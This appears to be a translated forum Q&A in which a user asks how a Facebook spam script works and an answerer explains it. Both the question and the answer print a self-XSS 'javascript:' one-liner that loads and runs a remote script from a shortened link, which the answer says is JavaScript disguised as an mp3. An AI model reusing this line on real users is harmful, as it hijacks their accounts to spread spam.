因此,我刚刚在Facebook上看到了用JavaScript编写的垃圾邮件代码,我想知道是否有人可以向我解释该代码的工作原理并与Facebook进行交互。我无意将其用于恶意目的,但我只是对Facebook等网站的安全性感兴趣。这是从地址栏执行的代码(我建议您不要自己尝试,您可能会遇到一些烦恼的朋友)。
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
最佳答案
在此处检查链接是否为url编码:
http://meyerweb.com/eric/tools/dencoder/
javascript:
a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)
从我所看到的:将该URL加载为脚本并将其添加到当前页面。
编辑:
加载的脚本位于以下URL:http://www.raxarstudios.com/x/audiotrack2.mp3
它被伪装成mp3歌曲,但只是javascript:http://pastebin.com/RVmNVtt9
我快速浏览了一下,它显然使用了一些沉重的ajax来添加事件并将它们自己加入其中。